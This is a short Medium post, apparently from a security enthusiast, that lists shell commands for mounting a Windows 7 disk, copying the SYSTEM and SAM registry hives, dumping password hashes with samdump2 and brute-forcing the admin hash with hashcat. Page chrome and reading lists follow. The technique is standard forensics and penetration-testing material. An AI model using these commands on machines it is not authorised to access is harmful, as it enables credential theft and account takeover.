Credentials from SYSTEM and SAM files | Windows 7 only

settings > storage > storage devices > controller: SATA
lsblk
mkdir /mnt/windowsDisk 
mount /dev/sdb2 /mnt/windowsDisk
cd /mnt/windowsDisk/Windows/System32/config/
cp SYSTEM SAM ~/
cd && samdump2 SYSTEM SAM
samdump2  SYSTEM SAM | grep admin > ~/hash.txt
hashcat -m 1000 -a 3 ~/hash.txt "?l?l?l?l?l?l?l?l" --force --potfile-path bitlocker.pot
#1 https://medium.com/@tomas_savenas/testing-bitlocker-security-1b90bd3f83d6#2 http://nixware.net/crack-windows-sam-backup-filesystem#3 https://superuser.com/questions/1178744/how-to-access-the-sam-file-in-windows-10

--

--

--

Kibernetinio saugumo entuziastas; Aktyviausias Lietuvis TryHackMe platformoje; Inovacijų valdymo ir Antreprenerystės Magistrantas @ KTU

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

What I Read — January 2021: US Foreign Spending, SolarWinds, Ransomware, Disinformation, and…

Facebook, Fashion and Data: Building Trust and Transparency Inside and Outside Washington

ButtonSwap is the first DEX aggregator built on Secret Network that combines liquidity from the…

Fairyproof’s Analysis of Exploitation on Brinc Finance

Attacking JSON Web Tokens (JWTs)

Six Cybersecurity Tips to Protect Your Small Business

Getting Into Cyber Security

LEET Language || 1337 Technique

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Tomas Savenas

Tomas Savenas

Kibernetinio saugumo entuziastas; Aktyviausias Lietuvis TryHackMe platformoje; Inovacijų valdymo ir Antreprenerystės Magistrantas @ KTU

More from Medium

Malicious Batch file Analysis

Break pass continue

Machine Learning for CyberSecurity

Steganography: Hiding payload behind image